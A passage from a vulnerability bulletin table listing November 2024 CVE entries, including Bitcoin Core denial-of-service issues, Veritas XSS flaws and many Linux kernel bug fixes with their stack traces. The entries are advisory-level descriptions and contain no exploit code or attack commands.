SemCms v4.8 was discovered to contain a SQL injection vulnerability. This allows an attacker to execute arbitrary code via the ldgid parameter in the SEMCMS_SeoAndTag.php component. | 2024-11-20 | not yet calculated | CVE-2024-52725 |
| n/a -- n/a |
CRMEB v5.4.0 is vulnerable to Arbitrary file read in the save_basics function which allows an attacker to obtain sensitive information | 2024-11-22 | not yet calculated | CVE-2024-52726 |
| n/a -- n/a |
D-LINK DI-8400 v16.07.26A1 was discovered to contain multiple remote command execution (RCE) vulnerabilities in the msp_info_htm function via the flag and cmd parameters. | 2024-11-20 | not yet calculated | CVE-2024-52739 |
| n/a -- n/a |
A cross-site scripting (XSS) vulnerability in the component /master/header.php of Ganglia-web v3.73 to v3.76 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the "tz" parameter. | 2024-11-19 | not yet calculated | CVE-2024-52762 |
| n/a -- n/a |
A cross-site scripting (XSS) vulnerability in the component /graph_all_periods.php of Ganglia-web v3.73 to v3.75 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the "g" parameter. | 2024-11-19 | not yet calculated | CVE-2024-52763 |
| n/a -- n/a |
An arbitrary file upload vulnerability in the component /admin/friendlink_edit of DedeBIZ v6.3.0 allows attackers to execute arbitrary code via uploading a crafted file. | 2024-11-20 | not yet calculated | CVE-2024-52769 |
| n/a -- n/a |
An arbitrary file upload vulnerability in the component /admin/file_manage_control of DedeBIZ v6.3.0 allows attackers to execute arbitrary code via uploading a crafted file. | 2024-11-20 | not yet calculated | CVE-2024-52770 |
| n/a -- n/a |
DedeBIZ v6.3.0 was discovered to contain an arbitrary file deletion vulnerability via the component /admin/file_manage_view. | 2024-11-20 | not yet calculated | CVE-2024-52771 |
| n/a -- n/a |
Tenda W9 v1.0.0.7(4456) was discovered to contain a hardcoded password vulnerability in /etc_ro/shadow, which allows attackers to log in as root. | 2024-11-19 | not yet calculated | CVE-2024-52788 |
| n/a -- n/a |
Tenda W30E v2.0 V16.01.0.8 was discovered to contain a hardcoded password vulnerability in /etc_ro/shadow, which allows attackers to log in as root. | 2024-11-19 | not yet calculated | CVE-2024-52789 |
| n/a -- n/a |
The Deno Standard Library provides APIs for Deno and the Web. Prior to version 1.0.11, `http/file-server`'s `serveDir` with `showDirListing: true` option is vulnerable to cross-site scripting when the attacker is a user who can control file names in the source directory on systems with POSIX file names. Exploitation might also be possible on other systems but less trivial due to e.g. lack of file name support for `<>` in Windows. Version 1.0.11 fixes the issue. | 2024-11-22 | not yet calculated | CVE-2024-52793 |
| n/a -- n/a |
Password Pusher, an open source application to communicate sensitive information over the web, comes with a configurable rate limiter. In versions prior to v1.49.0, the rate limiter could be bypassed by forging proxy headers allowing bad actors to send unlimited traffic to the site potentially causing a denial of service. In v1.49.0, a fix was implemented to only authorize proxies on local IPs which resolves this issue. As a workaround, one may add rules to one's proxy and/or firewall to not accept external proxy headers such as `X-Forwarded-*` from clients. | 2024-11-20 | not yet calculated | CVE-2024-52796 |
| n/a -- n/a |
Opencast is free and open source software for automated video capture and distribution. First noticed in Opencast 13 and 14, Opencast's Elasticsearch integration may generate syntactically invalid Elasticsearch queries in relation to previously acceptable search queries. From Opencast version 11.4 and newer, Elasticsearch queries are retried a configurable number of times in the case of error to handle temporary losses of connection to Elasticsearch. These invalid queries would fail, causing the retry mechanism to begin requerying with the same syntactically invalid query immediately, in an infinite loop. This causes a massive increase in log size which can in some cases cause a denial of service due to disk exhaustion. Opencast 13.10 and Opencast 14.3 contain patches which address the base issue, with Opencast 16.7 containing changes which harmonize the search behaviour between the admin UI and external API. Users are strongly recommended to upgrade as soon as possible if running versions prior to 13.10 or 14.3. While the relevant endpoints require (by default) `ROLE_ADMIN` or `ROLE_API_SERIES_VIEW`, the problem queries are otherwise innocuous. This issue could be easily triggered by normal administrative work on an affected Opencast system. Those who run a version newer than 13.10 and 14.3 and see different results when searching in their admin UI vs your external API or LMS, may resolve the issue by upgrading to 16.7. No known workarounds for the vulnerability are available. | 2024-11-21 | not yet calculated | CVE-2024-52797 |
| n/a -- n/a |
Argo Workflows Chart is used to set up argo and its needed dependencies through one command. Prior to 0.44.0, the workflow-role has excessive privileges, the worst being create pods/exec, which will allow kubectl exec into any Pod in the same namespace, i.e. arbitrary code execution within those Pods. If a user can be made to run a malicious template, their whole namespace can be compromised. This affects versions of the argo-workflows Chart that use appVersion: 3.4 and above, which no longer need these permissions for the only available Executor, Emissary. It could also affect users below 3.4 depending on their choice of Executor in those versions. This only affects the Helm Chart and not the upstream manifests. This vulnerability is fixed in 0.44.0. | 2024-11-21 | not yet calculated | CVE-2024-52799 |
| n/a -- n/a |
RIOT is an operating system for internet of things (IoT) devices. In version 2024.04 and prior, the function `_parse_advertise`, located in `/sys/net/application_layer/dhcpv6/client.c`, has no minimum header length check for `dhcpv6_opt_t` after processing `dhcpv6_msg_t`. This omission could lead to an out-of-bound read, causing system inconsistency. Additionally, the same lack of a header length check is present in the function `_preparse_advertise`, which is called by `_parse_advertise` before handling the request. As of time of publication, no known patched version exists. | 2024-11-22 | not yet calculated | CVE-2024-52802 |
| n/a -- n/a |
LLama Factory enables fine-tuning of large language models. A critical remote OS command injection vulnerability has been identified in the LLama Factory training process. This vulnerability arises from improper handling of user input, allowing malicious actors to execute arbitrary OS commands on the host system. The issue is caused by insecure usage of the `Popen` function with `shell=True`, coupled with unsanitized user input. Immediate remediation is required to mitigate the risk. This vulnerability is fixed in 0.9.1. | 2024-11-21 | not yet calculated | CVE-2024-52803 |
| n/a -- n/a |
Tornado is a Python web framework and asynchronous networking library. The algorithm used for parsing HTTP cookies in Tornado versions prior to 6.4.2 sometimes has quadratic complexity, leading to excessive CPU consumption when parsing maliciously-crafted cookie headers. This parsing occurs in the event loop thread and may block the processing of other requests. Version 6.4.2 fixes the issue. | 2024-11-22 | not yet calculated | CVE-2024-52804 |
| n/a -- n/a |
Argo Helm is a collection of community maintained charts for `argoproj.github.io` projects. Prior to version 0.45.0, the `workflow-role`) lacks granularity in its privileges, giving permissions to `workflowtasksets` and `workflowartifactgctasks` to all workflow Pods, when only certain types of Pods created by the Controller require these privileges. The impact is minimal, as an attack could only affect status reporting for certain types of Pods and templates. Version 0.45.0 fixes the issue. | 2024-11-22 | not yet calculated | CVE-2024-52814 |
| n/a -- n/a |
Bitcoin Core before 0.21.0 allows a network split that is resultant from an integer overflow (calculating the time offset for newly connecting peers) and an abs64 logic bug. | 2024-11-18 | not yet calculated | CVE-2024-52912 |
| n/a -- n/a |
In Bitcoin Core before 0.21.0, an attacker could prevent a node from seeing a specific unconfirmed transaction, because transaction re-requests are mishandled. | 2024-11-18 | not yet calculated | CVE-2024-52913 |
| n/a -- n/a |
In Bitcoin Core before 0.18.0, a node could be stalled for hours when processing the orphans of a crafted unconfirmed transaction. | 2024-11-18 | not yet calculated | CVE-2024-52914 |
| n/a -- n/a |
Bitcoin Core before 0.20.0 allows remote attackers to cause a denial of service (memory consumption) via a crafted INV message. | 2024-11-18 | not yet calculated | CVE-2024-52915 |
| n/a -- n/a |
Bitcoin Core before 0.15.0 allows a denial of service (OOM kill of a daemon process) via a flood of minimum difficulty headers. | 2024-11-18 | not yet calculated | CVE-2024-52916 |
| n/a -- n/a |
Bitcoin Core before 22.0 has a miniupnp infinite loop in which it allocates memory on the basis of random data received over the network, e.g., large M-SEARCH replies from a fake UPnP device. | 2024-11-18 | not yet calculated | CVE-2024-52917 |
| n/a -- n/a |
Bitcoin-Qt in Bitcoin Core before 0.20.0 allows remote attackers to cause a denial of service (memory consumption and application crash) via a BIP21 r parameter for a URL that has a large file. | 2024-11-18 | not yet calculated | CVE-2024-52918 |
| n/a -- n/a |
Bitcoin Core before 22.0 has a CAddrMan nIdCount integer overflow and resultant assertion failure (and daemon exit) via a flood of addr messages. | 2024-11-18 | not yet calculated | CVE-2024-52919 |
| n/a -- n/a |
Bitcoin Core before 0.20.0 allows remote attackers to cause a denial of service (infinite loop) via a malformed GETDATA message. | 2024-11-18 | not yet calculated | CVE-2024-52920 |
| n/a -- n/a |
In Bitcoin Core before 25.0, a peer can affect the download state of other peers by sending a mutated block. | 2024-11-18 | not yet calculated | CVE-2024-52921 |
| n/a -- n/a |
In Bitcoin Core before 25.1, an attacker can cause a node to not download the latest block, because there can be minutes of delay when an announcing peer stalls instead of complying with the peer-to-peer protocol specification. | 2024-11-18 | not yet calculated | CVE-2024-52922 |
| n/a -- n/a |
Delinea Privilege Manager before 12.0.2 mishandles the security of the Windows agent. | 2024-11-18 | not yet calculated | CVE-2024-52926 |
| n/a -- n/a |
AnyDesk through 8.1.0 on Windows, when Allow Direct Connections is enabled, inadvertently exposes a public IP address within network traffic. The attacker must know the victim's AnyDesk ID. | 2024-11-18 | not yet calculated | CVE-2024-52940 |
| n/a -- n/a |
An issue was discovered in Veritas Enterprise Vault before 15.1 UPD882911, ZDI-CAN-24695. It allows an authenticated remote attacker to inject a parameter into an HTTP request, allowing for Cross-Site Scripting (XSS) while viewing archived content. This could reflect back to an authenticated user without sanitization if executed by that user. | 2024-11-18 | not yet calculated | CVE-2024-52941 |
| n/a -- n/a |
An issue was discovered in Veritas Enterprise Vault before 15.1 UPD882911, ZDI-CAN-24696. It allows an authenticated remote attacker to inject a parameter into an HTTP request, allowing for Cross-Site Scripting (XSS) while viewing archived content. This could reflect back to an authenticated user without sanitization if executed by that user. | 2024-11-18 | not yet calculated | CVE-2024-52942 |
| n/a -- n/a |
An issue was discovered in Veritas Enterprise Vault before 15.1 UPD882911, ZDI-CAN-24697. It allows an authenticated remote attacker to inject a parameter into an HTTP request, allowing for Cross-Site Scripting (XSS) while viewing archived content. This could reflect back to an authenticated user without sanitization if executed by that user. | 2024-11-18 | not yet calculated | CVE-2024-52943 |
| n/a -- n/a |
An issue was discovered in Veritas Enterprise Vault before 15.1 UPD882911, ZDI-CAN-24698. It allows an authenticated remote attacker to inject a parameter into an HTTP request, allowing for Cross-Site Scripting while viewing archived content. This could reflect back to an authenticated user without sanitization if executed by that user. | 2024-11-18 | not yet calculated | CVE-2024-52944 |
| n/a -- n/a |
An issue was discovered in Veritas NetBackup before 10.5. This only applies to NetBackup components running on a Windows Operating System. If a user executes specific NetBackup commands or an attacker uses social engineering techniques to impel the user to execute the commands, a malicious DLL could be loaded, resulting in execution of the attacker's code in the user's security context. | 2024-11-18 | not yet calculated | CVE-2024-52945 |
| n/a -- n/a |
An issue was discovered in LemonLDAP::NG before 2.20.1. An Improper Check during session refresh allows an authenticated user to raise their authentication level if the admin configured an "Adaptative authentication rule" with an increment instead of an absolute value. | 2024-11-18 | not yet calculated | CVE-2024-52946 |
| n/a -- n/a |
A cross-site scripting (XSS) vulnerability in LemonLDAP::NG before 2.20.1 allows remote attackers to inject arbitrary web script or HTML via the url parameter of the upgrade session confirmation page (upgradeSession / forceUpgrade) if the "Upgrade session" plugin has been enabled by an admin | 2024-11-18 | not yet calculated | CVE-2024-52947 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: ipv4: ip_tunnel: Fix suspicious RCU usage warning in ip_tunnel_init_flow() There are code paths from which the function is called without holding the RCU read lock, resulting in a suspicious RCU usage warning [1]. Fix by using l3mdev_master_upper_ifindex_by_index() which will acquire the RCU read lock before calling l3mdev_master_upper_ifindex_by_index_rcu(). [1] WARNING: suspicious RCU usage 6.12.0-rc3-custom-gac8f72681cf2 #141 Not tainted ----------------------------- net/core/dev.c:876 RCU-list traversed in non-reader section!! other info that might help us debug this: rcu_scheduler_active = 2, debug_locks = 1 1 lock held by ip/361: #0: ffffffff86fc7cb0 (rtnl_mutex){+.+.}-{3:3}, at: rtnetlink_rcv_msg+0x377/0xf60 stack backtrace: CPU: 3 UID: 0 PID: 361 Comm: ip Not tainted 6.12.0-rc3-custom-gac8f72681cf2 #141 Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011 Call Trace: <TASK> dump_stack_lvl+0xba/0x110 lockdep_rcu_suspicious.cold+0x4f/0xd6 dev_get_by_index_rcu+0x1d3/0x210 l3mdev_master_upper_ifindex_by_index_rcu+0x2b/0xf0 ip_tunnel_bind_dev+0x72f/0xa00 ip_tunnel_newlink+0x368/0x7a0 ipgre_newlink+0x14c/0x170 __rtnl_newlink+0x1173/0x19c0 rtnl_newlink+0x6c/0xa0 rtnetlink_rcv_msg+0x3cc/0xf60 netlink_rcv_skb+0x171/0x450 netlink_unicast+0x539/0x7f0 netlink_sendmsg+0x8c1/0xd80 ____sys_sendmsg+0x8f9/0xc20 ___sys_sendmsg+0x197/0x1e0 __sys_sendmsg+0x122/0x1f0 do_syscall_64+0xbb/0x1d0 entry_SYSCALL_64_after_hwframe+0x77/0x7f | 2024-11-19 | not yet calculated | CVE-2024-53042 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: net/sched: sch_api: fix xa_insert() error path in tcf_block_get_ext() This command: $ tc qdisc replace dev eth0 ingress_block 1 egress_block 1 clsact Error: block dev insert failed: -EBUSY. fails because user space requests the same block index to be set for both ingress and egress. [ side note, I don't think it even failed prior to commit 913b47d3424e ("net/sched: Introduce tc block netdev tracking infra"), because this is a command from an old set of notes of mine which used to work, but alas, I did not scientifically bisect this ] The problem is not that it fails, but rather, that the second time around, it fails differently (and irrecoverably): $ tc qdisc replace dev eth0 ingress_block 1 egress_block 1 clsact Error: dsa_core: Flow block cb is busy. [ another note: the extack is added by me for illustration purposes. the context of the problem is that clsact_init() obtains the same &q->ingress_block pointer as &q->egress_block, and since we call tcf_block_get_ext() on both of them, "dev" will be added to the block->ports xarray twice, thus failing the operation: once through the ingress block pointer, and once again through the egress block pointer. the problem itself is that when xa_insert() fails, we have emitted a FLOW_BLOCK_BIND command through ndo_setup_tc(), but the offload never sees a corresponding FLOW_BLOCK_UNBIND. ] Even correcting the bad user input, we still cannot recover: $ tc qdisc replace dev swp3 ingress_block 1 egress_block 2 clsact Error: dsa_core: Flow block cb is busy. Basically the only way to recover is to reboot the system, or unbind and rebind the net device driver. To fix the bug, we need to fill the correct error teardown path which was missed during code movement, and call tcf_block_offload_unbind() when xa_insert() fails. [ last note, fundamentally I blame the label naming convention in tcf_block_get_ext() for the bug. The labels should be named after what they do, not after the error path that jumps to them. This way, it is obviously wrong that two labels pointing to the same code mean something is wrong, and checking the code correctness at the goto site is also easier ] | 2024-11-19 | not yet calculated | CVE-2024-53044 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: ASoC: dapm: fix bounds checker error in dapm_widget_list_create The widgets array in the snd_soc_dapm_widget_list has a __counted_by attribute attached to it, which points to the num_widgets variable. This attribute is used in bounds checking, and if it is not set before the array is filled, then the bounds sanitizer will issue a warning or a kernel panic if CONFIG_UBSAN_TRAP is set. This patch sets the size of the widgets list calculated with list_for_each as the initial value for num_widgets as it is used for allocating memory for the array. It is updated with the actual number of added elements after the array is filled. | 2024-11-19 | not yet calculated | CVE-2024-53045 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: arm64: dts: imx8ulp: correct the flexspi compatible string The flexspi on imx8ulp only has 16 LUTs, and imx8mm flexspi has 32 LUTs, so correct the compatible string here, otherwise will meet below error: [ 1.119072] ------------[ cut here ]------------ [ 1.123926] WARNING: CPU: 0 PID: 1 at drivers/spi/spi-nxp-fspi.c:855 nxp_fspi_exec_op+0xb04/0xb64 [ 1.133239] Modules linked in: [ 1.136448] CPU: 0 UID: 0 PID: 1 Comm: swapper/0 Not tainted 6.11.0-rc6-next-20240902-00001-g131bf9439dd9 #69 [ 1.146821] Hardware name: NXP i.MX8ULP EVK (DT) [ 1.151647] pstate: 40000005 (nZcv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--) [ 1.158931] pc : nxp_fspi_exec_op+0xb04/0xb64 [ 1.163496] lr : nxp_fspi_exec_op+0xa34/0xb64 [ 1.168060] sp : ffff80008002b2a0 [ 1.171526] x29: ffff80008002b2d0 x28: 0000000000000000 x27: 0000000000000000 [ 1.179002] x26: ffff2eb645542580 x25: ffff800080610014 x24: ffff800080610000 [ 1.186480] x23: ffff2eb645548080 x22: 0000000000000006 x21: ffff2eb6455425e0 [ 1.193956] x20: 0000000000000000 x19: ffff80008002b5e0 x18: ffffffffffffffff [ 1.201432] x17: ffff2eb644467508 x16: 0000000000000138 x15: 0000000000000002 [ 1.208907] x14: 0000000000000000 x13: ffff2eb6400d8080 x12: 00000000ffffff00 [ 1.216378] x11: 0000000000000000 x10: ffff2eb6400d8080 x9 : ffff2eb697adca80 [ 1.223850] x8 : ffff2eb697ad3cc0 x7 : 0000000100000000 x6 : 0000000000000001 [ 1.231324] x5 : 0000000000000000 x4 : 0000000000000000 x3 : 00000000000007a6 [ 1.238795] x2 : 0000000000000000 x1 : 00000000000001ce x0 : 00000000ffffff92 [ 1.246267] Call trace: [ 1.248824] nxp_fspi_exec_op+0xb04/0xb64 [ 1.253031] spi_mem_exec_op+0x3a0/0x430 [ 1.257139] spi_nor_read_id+0x80/0xcc [ 1.261065] spi_nor_scan+0x1ec/0xf10 [ 1.264901] spi_nor_probe+0x108/0x2fc [ 1.268828] spi_mem_probe+0x6c/0xbc [ 1.272574] spi_probe+0x84/0xe4 [ 1.275958] really_probe+0xbc/0x29c [ 1.279713] __driver_probe_device+0x78/0x12c [ 1.284277] driver_probe_device+0xd8/0x15c [ 1.288660] __device_attach_driver+0xb8/0x134 [ 1.293316] bus_for_each_drv+0x88/0xe8 [ 1.297337] __device_attach+0xa0/0x190 [ 1.301353] device_initial_probe+0x14/0x20 [ 1.305734] bus_probe_device+0xac/0xb0 [ 1.309752] device_add+0x5d0/0x790 [ 1.313408] __spi_add_device+0x134/0x204 [ 1.317606] of_register_spi_device+0x3b4/0x590 [ 1.322348] spi_register_controller+0x47c/0x754 [ 1.327181] devm_spi_register_controller+0x4c/0xa4 [ 1.332289] nxp_fspi_probe+0x1cc/0x2b0 [ 1.336307] platform_probe+0x68/0xc4 [ 1.340145] really_probe+0xbc/0x29c [ 1.343893] __driver_probe_device+0x78/0x12c [ 1.348457] driver_probe_device+0xd8/0x15c [ 1.352838] __driver_attach+0x90/0x19c [ 1.356857] bus_for_each_dev+0x7c/0xdc [ 1.360877] driver_attach+0x24/0x30 [ 1.364624] bus_add_driver+0xe4/0x208 [ 1.368552] driver_register+0x5c/0x124 [ 1.372573] __platform_driver_register+0x28/0x34 [ 1.377497] nxp_fspi_driver_init+0x1c/0x28 [ 1.381888] do_one_initcall+0x80/0x1c8 [ 1.385908] kernel_init_freeable+0x1c4/0x28c [ 1.390472] kernel_init+0x20/0x1d8 [ 1.394138] ret_from_fork+0x10/0x20 [ 1.397885] ---[ end trace 0000000000000000 ]--- [ 1.407908] ------------[ cut here ]------------ | 2024-11-19 | not yet calculated | CVE-2024-53046 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: mptcp: init: protect sched with rcu_read_lock Enabling CONFIG_PROVE_RCU_LIST with its dependence CONFIG_RCU_EXPERT creates this splat when an MPTCP socket is created: ============================= WARNING: suspicious RCU usage 6.12.0-rc2+ #11 Not tainted ----------------------------- net/mptcp/sched.c:44 RCU-list traversed in non-reader section!! other info that might help us debug this: rcu_scheduler_active = 2, debug_locks = 1 no locks held by mptcp_connect/176. stack backtrace: CPU: 0 UID: 0 PID: 176 Comm: mptcp_connect Not tainted 6.12.0-rc2+ #11 Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011 Call Trace: <TASK> dump_stack_lvl (lib/dump_stack.c:123) lockdep_rcu_suspicious (kernel/locking/lockdep.c:6822) mptcp_sched_find (net/mptcp/sched.c:44 (discriminator 7)) mptcp_init_sock (net/mptcp/protocol.c:2867 (discriminator 1)) ? sock_init_data_uid (arch/x86/include/asm/atomic.h:28) inet_create.part.0.constprop.0 (net/ipv4/af_inet.c:386) ? __sock_create (include/linux/rcupdate.h:347 (discriminator 1)) __sock_create (net/socket.c:1576) __sys_socket (net/socket.c:1671) ? __pfx___sys_socket (net/socket.c:1712) ? do_user_addr_fault (arch/x86/mm/fault.c:1419 (discriminator 1)) __x64_sys_socket (net/socket.c:1728) do_syscall_64 (arch/x86/entry/common.c:52 (discriminator 1)) entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130) That's because when the socket is initialised, rcu_read_lock() is not used despite the explicit comment written above the declaration of mptcp_sched_find() in sched.c. Adding the missing lock/unlock avoids the warning. | 2024-11-19 | not yet calculated | CVE-2024-53047 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: ice: fix crash on probe for DPLL enabled E810 LOM The E810 Lan On Motherboard (LOM) design is vendor specific. Intel provides the reference design, but it is up to vendor on the final product design. For some cases, like Linux DPLL support, the static values defined in the driver does not reflect the actual LOM design. Current implementation of dpll pins is causing the crash on probe of the ice driver for such DPLL enabled E810 LOM designs: WARNING: (...) at drivers/dpll/dpll_core.c:495 dpll_pin_get+0x2c4/0x330 ... Call Trace: <TASK> ? __warn+0x83/0x130 ? dpll_pin_get+0x2c4/0x330 ? report_bug+0x1b7/0x1d0 ? handle_bug+0x42/0x70 ? exc_invalid_op+0x18/0x70 ? asm_exc_invalid_op+0x1a/0x20 ? dpll_pin_get+0x117/0x330 ? dpll_pin_get+0x2c4/0x330 ? dpll_pin_get+0x117/0x330 ice_dpll_get_pins.isra.0+0x52/0xe0 [ice] ... The number of dpll pins enabled by LOM vendor is greater than expected and defined in the driver for Intel designed NICs, which causes the crash. Prevent the crash and allow generic pin initialization within Linux DPLL subsystem for DPLL enabled E810 LOM designs. Newly designed solution for described issue will be based on "per HW design" pin initialization. It requires pin information dynamically acquired from the firmware and is already in progress, planned for next-tree only. | 2024-11-19 | not yet calculated | CVE-2024-53048 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: wifi: iwlwifi: mvm: Fix response handling in iwl_mvm_send_recovery_cmd() 1. The size of the response packet is not validated. 2. The response buffer is not freed. Resolve these issues by switching to iwl_mvm_send_cmd_status(), which handles both size validation and frees the buffer. | 2024-11-19 | not yet calculated | CVE-2024-53059 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: prevent NULL pointer dereference if ATIF is not supported acpi_evaluate_object() may return AE_NOT_FOUND (failure), which would result in dereferencing buffer.pointer (obj) while being NULL. Although this case may be unrealistic for the current code, it is still better to protect against possible bugs. Bail out also when status is AE_NOT_FOUND. This fixes 1 FORWARD_NULL issue reported by Coverity Report: CID 1600951: Null pointer dereferences (FORWARD_NULL) (cherry picked from commit 91c9e221fe2553edf2db71627d8453f083de87a1) | 2024-11-19 | not yet calculated | CVE-2024-53060 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: drm/panthor: Be stricter about IO mapping flags The current panthor_device_mmap_io() implementation has two issues: 1. For mapping DRM_PANTHOR_USER_FLUSH_ID_MMIO_OFFSET, panthor_device_mmap_io() bails if VM_WRITE is set, but does not clear VM_MAYWRITE. That means userspace can use mprotect() to make the mapping writable later on. This is a classic Linux driver gotcha. I don't think this actually has any impact in practice: When the GPU is powered, writes to the FLUSH_ID seem to be ignored; and when the GPU is not powered, the dummy_latest_flush page provided by the driver is deliberately designed to not do any flushes, so the only thing writing to the dummy_latest_flush could achieve would be to make *more* flushes happen. 2. panthor_device_mmap_io() does not block MAP_PRIVATE mappings (which are mappings without the VM_SHARED flag). MAP_PRIVATE in combination with VM_MAYWRITE indicates that the VMA has copy-on-write semantics, which for VM_PFNMAP are semi-supported but fairly cursed. In particular, in such a mapping, the driver can only install PTEs during mmap() by calling remap_pfn_range() (because remap_pfn_range() wants to **store the physical address of the mapped physical memory into the vm_pgoff of the VMA**); installing PTEs later on with a fault handler (as panthor does) is not supported in private mappings, and so if you try to fault in such a mapping, vmf_insert_pfn_prot() splats when it hits a BUG() check. Fix it by clearing the VM_MAYWRITE flag (userspace writing to the FLUSH_ID doesn't make sense) and requiring VM_SHARED (copy-on-write semantics for the FLUSH_ID don't make sense). Reproducers for both scenarios are in the notes of my patch on the mailing list; I tested that these bugs exist on a Rock 5B machine. Note that I only compile-tested the patch, I haven't tested it; I don't have a working kernel build setup for the test machine yet. Please test it before applying it. | 2024-11-19 | not yet calculated | CVE-2024-53071 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: mm/thp: fix deferred split unqueue naming and locking Recent changes are putting more pressure on THP deferred split queues: under load revealing long-standing races, causing list_del corruptions, "Bad page state"s and worse (I keep BUGs in both of those, so usually don't get to see how badly they end up without). The relevant recent changes being 6.8's mTHP, 6.10's mTHP swapout, and 6.12's mTHP swapin, improved swap allocation, and underused THP splitting. Before fixing locking: rename misleading folio_undo_large_rmappable(), which does not undo large_rmappable, to folio_unqueue_deferred_split(), which is what it does. But that and its out-of-line __callee are mm internals of very limited usability: add comment and WARN_ON_ONCEs to check usage; and return a bool to say if a deferred split was unqueued, which can then be used in WARN_ON_ONCEs around safety checks (sparing callers the arcane conditionals in __folio_unqueue_deferred_split()). Just omit the folio_unqueue_deferred_split() from free_unref_folios(), all of whose callers now call it beforehand (and if any forget then bad_page() will tell) - except for its caller put_pages_list(), which itself no longer has any callers (and will be deleted separately). Swapout: mem_cgroup_swapout() has been resetting folio->memcg_data 0 without checking and unqueueing a THP folio from deferred split list; which is unfortunate, since the split_queue_lock depends on the memcg (when memcg is enabled); so swapout has been unqueueing such THPs later, when freeing the folio, using the pgdat's lock instead: potentially corrupting the memcg's list. __remove_mapping() has frozen refcount to 0 here, so no problem with calling folio_unqueue_deferred_split() before resetting memcg_data. That goes back to 5.4 commit 87eaceb3faa5 ("mm: thp: make deferred split shrinker memcg aware"): which included a check on swapcache before adding to deferred queue, but no check on deferred queue before adding THP to swapcache. That worked fine with the usual sequence of events in reclaim (though there were a couple of rare ways in which a THP on deferred queue could have been swapped out), but 6.12 commit dafff3f4c850 ("mm: split underused THPs") avoids splitting underused THPs in reclaim, which makes swapcache THPs on deferred queue commonplace. Keep the check on swapcache before adding to deferred queue? Yes: it is no longer essential, but preserves the existing behaviour, and is likely to be a worthwhile optimization (vmstat showed much more traffic on the queue under swapping load if the check was removed); update its comment. Memcg-v1 move (deprecated): mem_cgroup_move_account() has been changing folio->memcg_data without checking and unqueueing a THP folio from the deferred list, sometimes corrupting "from" memcg's list, like swapout. Refcount is non-zero here, so folio_unqueue_deferred_split() can only be used in a WARN_ON_ONCE to validate the fix, which must be done earlier: mem_cgroup_move_charge_pte_range() first try to split the THP (splitting of course unqueues), or skip it if that fails. Not ideal, but moving charge has been requested, and khugepaged should repair the THP later: nobody wants new custom unqueueing code just for this deprecated case. The 87eaceb3faa5 commit did have the code to move from one deferred list to another (but was not conscious of its unsafety while refcount non-0); but that was removed by 5.6 commit fac0516b5534 ("mm: thp: don't need care deferred split queue in memcg charge move path"), which argued that the existence of a PMD mapping guarantees that the THP cannot be on a deferred list. As above, false in rare cases, and now commonly false. Backport to 6.11 should be straightforward. Earlier backports must take care that other _deferred_list fixes and dependencies are included. There is not a strong case for backports, but they can fix cornercases. | 2024-11-19 | not yet calculated | CVE-2024-53079 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: drm/panthor: Lock XArray when getting entries for the VM Similar to commit cac075706f29 ("drm/panthor: Fix race when converting group handle to group object") we need to use the XArray's internal locking when retrieving a vm pointer from there. v2: Removed part of the patch that was trying to protect fetching the heap pointer from XArray, as that operation is protected by the @pool->lock. | 2024-11-19 | not yet calculated | CVE-2024-53080 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: media: ar0521: don't overflow when checking PLL values The PLL checks are comparing 64 bit integers with 32 bit ones, as reported by Coverity. Depending on the values of the variables, this may underflow. Fix it ensuring that both sides of the expression are u64. | 2024-11-19 | not yet calculated | CVE-2024-53081 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: usb: typec: qcom-pmic: init value of hdr_len/txbuf_len earlier If the read of USB_PDPHY_RX_ACKNOWLEDGE_REG failed, then hdr_len and txbuf_len are uninitialized. This commit stops to print uninitialized value and misleading/false data. | 2024-11-19 | not yet calculated | CVE-2024-53083 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: drm/imagination: Break an object reference loop When remaining resources are being cleaned up on driver close, outstanding VM mappings may result in resources being leaked, due to an object reference loop, as shown below, with each object (or set of objects) referencing the object below it: PVR GEM Object GPU scheduler "finished" fence GPU scheduler "scheduled" fence PVR driver "done" fence PVR Context PVR VM Context PVR VM Mappings PVR GEM Object The reference that the PVR VM Context has on the VM mappings is a soft one, in the sense that the freeing of outstanding VM mappings is done as part of VM context destruction; no reference counts are involved, as is the case for all the other references in the loop. To break the reference loop during cleanup, free the outstanding VM mappings before destroying the PVR Context associated with the VM context. | 2024-11-19 | not yet calculated | CVE-2024-53084 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: tpm: Lock TPM chip in tpm_pm_suspend() first Setting TPM_CHIP_FLAG_SUSPENDED in the end of tpm_pm_suspend() can be racy according, as this leaves window for tpm_hwrng_read() to be called while the operation is in progress. The recent bug report gives also evidence of this behaviour. Aadress this by locking the TPM chip before checking any chip->flags both in tpm_pm_suspend() and tpm_hwrng_read(). Move TPM_CHIP_FLAG_SUSPENDED check inside tpm_get_random() so that it will be always checked only when the lock is reserved. | 2024-11-19 | not yet calculated | CVE-2024-53085 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: drm/xe: Drop VM dma-resv lock on xe_sync_in_fence_get failure in exec IOCTL Upon failure all locks need to be dropped before returning to the user. (cherry picked from commit 7d1a4258e602ffdce529f56686925034c1b3b095) | 2024-11-19 | not yet calculated | CVE-2024-53086 |
| n/a -- n/a |
